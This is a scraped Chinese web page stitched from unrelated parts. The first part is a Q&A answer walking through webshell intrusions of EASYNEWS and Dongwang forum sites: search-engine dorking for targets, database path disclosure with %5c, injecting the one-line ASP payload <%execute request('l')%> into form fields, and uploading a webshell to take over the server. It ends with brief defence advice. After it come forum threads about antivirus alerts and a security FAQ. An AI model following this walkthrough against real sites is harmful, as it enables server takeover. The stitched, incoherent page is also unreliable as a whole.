下载作业帮安装包
扫二维码下载作业帮
1.75亿学生的选择
什么是一句话木马做什么用的?怎么用
一句话木马的使用实例一：“一句话木马”入侵“EASYNEWS新闻管理系统” “EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器. Step1 搜索入侵目标 使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“www.****.COM 版权所有”.只要在GOOGLE或百度中以该字符串为关键词进行搜索,就可以找到大量的入侵目标. Step2 检测入侵条件 在这里,我们以网站“http://www.****.com/news/index.htm”为例进行一次入侵检测.“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.****.com/news/ebook/db/ebook.asp”,回车后在浏览器页面中将显示访问留言本数据库文件的返回信息.如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵. Step3 在数据库中插入ASP后门 前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码： 在浏览器中访问“http://www.****.com/news/khly.htm”,打开提交留言页面.在提交页面中的“主页”栏中,直接填写“一句话木马”服务端代码,其它随便填写.确定后点击“发表留言”按钮,文章发表成功后,即可将“一句话木马”服务端代码插入到留言本数据库中了. Step4 连接后门上传Webshell 由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行.将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码.点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存. Step5 打开WEBSHELL 上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“http://www.****.com/news/ebook/db/temp.asp”,输入默认的密码“”,就可以看到一个WEBSHELL了. 在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了.实例二 “社区超市”入侵动网论坛 Step1 检测入侵条件 以入侵论坛“http://www.****.com/”为例.首先在浏览器地址栏中输入“http://www.****.com/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息.说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵. Step2 在数据库中插入ASP后门 登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面.在该页面中选择商店申请,打开“商店申请入驻”页面“http://www.****.com/z_shop_newshop.asp”,在页面中填写任意信息,注意在“商店招牌”栏中,添加刚才的ASP代码"〈%execute request("l")%〉".确定后点击“申请”按钮进行提交,即可将ASP代码保存在数据库文件中了. 后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“http://sdoygb.w2.****.net/data/shop.asp”,然后上传WEBSHELL就可以控制论坛服务器了. 实例三 “一句话木马”入侵未知网站 从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址.对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法. Step1 暴库得到数据库路径 以“http://bbs.****.com”为例.在浏览器中打开“http://bbs.****.com/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址：“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以.因此数据库文件的实际WEB地址为“http://bbs.****.com/join/admin/adshuilonG!%23).asp” Step2 注册网站,插入“一句话木马” 由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去. 在网页上点击注册网站按钮,打开注册链接“http://bbs.****.com/join/add.asp过滤了=step3&bid=3”,在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码,其它随便填写.然后点击完成按钮提交数据,木马服务端就被插入到数据库文件中了. 最后只需要用蓝屏木马连接数据库文件“http://bbs.****.com/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了. “一句话木马”的防范 要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址.这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了. 其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等.例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行. 只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了.
为您推荐：
其他类似问题
扫描下载二维码查看: 2332|回复: 4
这个是什么木马啊？
类型:木马-virus.ini.autorun.h
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:QEX引擎
文件路径:C:\Windows\system32\quick7.reg
文件大小:41.5K (42,463 字节)
文件指纹（MD5）:e3ef08fea2ffb6eb48149e
数字签名是否有效:无效
处理建议:修复文件
用NOD32扫描却没有报
不排除误报，reg是注册表文件，双击文件可以导入注册表。你把文件发到病毒样本区让别人给你看看。
NOD32查杀病毒不顶的，换个国产杀毒软件查杀一下试试。
看起来这个注册表有创建启动项的行为。
所以才给报了。
BTO灬傲视皇朝
你用的是什么杀软？
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.1( 苏ICP备号 ) GMT+8,是时候，换个姿势关注TA
关注 功能升级，收割　TA 的最新动态
扫我下载最新九游APP
查看: 686|回复: 6
最后登录积分15268精华0帖子
Lv15炉火纯青, 经验 15268, 距离下一级还需 1332 经验
卧槽，今天刚下这个游戏想玩玩，没想到360提醒我这是个木马，我纳闷了，那么多人人玩怎么还是木马?大家给点意见
(56.73 KB, 下载次数: 1)
03:17 上传
点击文件名下载附件
(72.76 KB, 下载次数: 1)
03:17 上传
点击文件名下载附件
最后登录积分27012精华0帖子
Lv18炉火纯青, 经验 27012, 距离下一级还需 988 经验
换一个版本，试一试。
&好吧，我试试看&
最后登录积分43651精华0帖子
Lv21已臻大成, 经验 43651, 距离下一级还需 4349 经验
换一个版本，或者换一个地方下载
最后登录积分2107精华0帖子
Lv7略有小成, 经验 2107, 距离下一级还需 893 经验
我擦嘞，你也不看看游戏名字？你那个不是我的世界好吗？
最后登录积分2763精华0帖子
Lv5略有小成, 经验 2763, 距离下一级还需 -1363 经验
下官方正版的
最后登录积分31361精华1帖子
Lv19炉火纯青, 经验 31361, 距离下一级还需 2639 经验
这不是我的世界，而是我的世界侠盗猎车手
最后登录积分8974精华4帖子
Lv12渐入佳境, 经验 8974, 距离下一级还需 26 经验
这个不是呃。。。。
通过论坛女生认证，鉴定为妹子身份的友友（有效期：长期）
安卓平台下载
苹果平台下载什么是木马和病毒
摘自　　来源：CnBeta
　　问：什么是网络安全？
　　答：网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭到破坏、更改、泄露，系统可以连续可靠正常地运行，网络服务不被中断。
　　问：什么是计算机病毒？
　　答：计算机病毒（Computer
Virus）是指编制者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。
　　问：什么是木马？
　　答：木马是一种带有恶意性质的远程控制软件。木马一般分为客户端（client）和服务器端（server）。客户端就是本地使用的各种命令的控制台，服务器端则是要给别人运行，只有运行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件。
　　问：什么是防火墙？它是如何确保网络安全的？
　　答：使用防火墙（Firewall）是一种确保网络安全的方法。防火墙是指设置在不同网络(如可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的惟一出入口，能根据企业的安全政策控制（允许、拒绝、监测）出入网络的信息流，且本身具有较强的抗攻击能力。它是提供信息安全服务，实现网络和信息安全的基础设施。
　　问：什么是后门？为什么会存在后门？
　　答：后门（Back
Door）是指一种绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段，程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道，或是在发布软件之前没有删除，那么它就成了安全隐患。
　　问：什么叫蠕虫病毒？
　　答：蠕虫病毒（Worm）源自第一种在网络上传播的病毒。1988年，22岁的康奈尔大学研究生罗伯特?莫里斯（Robert
Morris）通过网络发送了一种专为攻击UNIX系统缺陷、名为“蠕虫”（Worm）的病毒。蠕虫造成了6000个系统瘫痪，估计损失为200万到6000万美元。由于这只蠕虫的诞生，在网上还专门成立了计算机应急小组（CERT）。现在蠕虫病毒家族已经壮大到成千上万种，并且这千万种蠕虫病毒大都出自黑客之手。
　　问：什么是操作系统型病毒？它有什么危害？
　　答：这种病毒会用它自己的程序加入操作系统或者取代部分操作系统进行工作，具有很强的破坏力，会导致整个系统瘫痪。而且由于感染了操作系统，这种病毒在运行时，会用自己的程序片断取代操作系统的合法程序模块。根据病毒自身的特点和被替代的操作系统中合法程序模块在操作系统中运行的地位与作用，以及病毒取代操作系统的取代方式等，对操作系统进行破坏。同时，这种病毒对系统中文件的感染性也很强。